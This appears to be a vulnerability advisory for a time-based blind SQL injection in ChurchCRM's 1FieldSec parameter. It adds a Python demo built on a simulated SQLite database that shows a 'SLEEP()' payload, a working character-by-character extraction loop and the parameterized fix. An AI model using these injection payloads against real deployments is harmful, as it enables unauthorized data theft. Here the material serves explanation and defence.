Description
ChurchCRM is an open-source church management system. ChurchCRM 6.2.0 and earlier contain a time-based blind SQL injection in the handling of the 1FieldSec parameter. Injecting SLEEP() into the parameter produces deterministic server-side delays, which shows that the value is incorporated into a SQL query without proper parameterization. An attacker can use blind techniques to exfiltrate and modify data.
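The mechanism the advisory describes, as an added example that is not ChurchCRM's code and does not reproduce its query: an in-memory SQLite database with a Python-defined SLEEP() standing in for MySQL's, a lookup that splices the request value into SQL text (the CWE-89 pattern) beside the parameterized fix, and a character-by-character extraction that uses only response time as its oracle. The table, column names, the secret value and the LookupService class are constructed for the demo. When probing a real deployment, send a control request with no delay (or SLEEP(0)) alongside each probe and repeat it, so network jitter is not mistaken for an injected delay.

```python
"""Time-based blind SQL injection, simulated, beside its parameterized fix.

Added example, not ChurchCRM code: it models the CWE-89 pattern the
advisory describes with an in-memory SQLite database. SQLite has no
SLEEP(), so a Python-defined SLEEP() stands in for MySQL's. The table,
columns and secret value are constructed for the demo.
"""
import sqlite3
import time

SLEEP_SECONDS = 0.1  # delay per SLEEP(1); kept short so the demo finishes fast


class LookupService:
    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.sleep_calls = 0
        # Stand-in for MySQL SLEEP(): records each call and really waits.
        self.conn.create_function("SLEEP", 1, self._sleep)
        self.conn.execute(
            "CREATE TABLE person (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
        self.conn.execute("INSERT INTO person VALUES (1, 'alice', 'k9z')")

    def _sleep(self, n):
        self.sleep_calls += 1
        time.sleep(SLEEP_SECONDS * float(n))
        return 0

    def lookup_vulnerable(self, field_sec):
        # CWE-89: request value spliced into SQL text, so it is parsed as SQL.
        sql = f"SELECT name FROM person WHERE id = {field_sec}"
        return [row[0] for row in self.conn.execute(sql)]

    def lookup_fixed(self, field_sec):
        # Fix: the value is bound as a parameter and can only ever be data.
        sql = "SELECT name FROM person WHERE id = ?"
        return [row[0] for row in self.conn.execute(sql, (field_sec,))]

    def sleep_triggered(self, fn, field_sec):
        """True if the query path executed SLEEP() at least once."""
        before = self.sleep_calls
        fn(field_sec)
        return self.sleep_calls > before

    def response_time(self, fn, field_sec):
        start = time.perf_counter()
        fn(field_sec)
        return time.perf_counter() - start

    def extract_secret_blind(self, max_len=8):
        """Recover person.secret through the vulnerable path using only
        response time as the oracle: one SLEEP-guarded probe per candidate
        character. The query never returns the secret in its result set."""
        alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
        threshold = SLEEP_SECONDS / 2  # halfway between no delay and one SLEEP(1)
        recovered = ""
        for pos in range(1, max_len + 1):
            hit = None
            for ch in alphabet:
                probe = (
                    "1 AND (CASE WHEN substr((SELECT secret FROM person WHERE id = 1),"
                    f" {pos}, 1) = '{ch}' THEN SLEEP(1) ELSE 0 END)"
                )
                if self.response_time(self.lookup_vulnerable, probe) >= threshold:
                    hit = ch
                    break
            if hit is None:  # no candidate delayed: end of string reached
                break
            recovered += hit
        return recovered


if __name__ == "__main__":
    svc = LookupService()
    payload = "1 AND SLEEP(1)"
    print("vulnerable slept:", svc.sleep_triggered(svc.lookup_vulnerable, payload))
    print("fixed slept:     ", svc.sleep_triggered(svc.lookup_fixed, payload))
    print("blind extraction:", svc.extract_secret_blind())
```

The parameterized path returns no row for the injected value because the whole string is compared against `id` as data; the vulnerable path parses it as SQL and runs SLEEP(). The extraction loop shows why a time-based oracle alone is enough for exfiltration: nothing from `secret` ever appears in a response, only in how long the response takes.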
Vulnerable configurations
Configuration 1: versions up to and including 6.2.0
cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
EPSS: 0.00041 (percentile 12%, Low)
CVSS3: 7.2 High
Weaknesses: CWE-89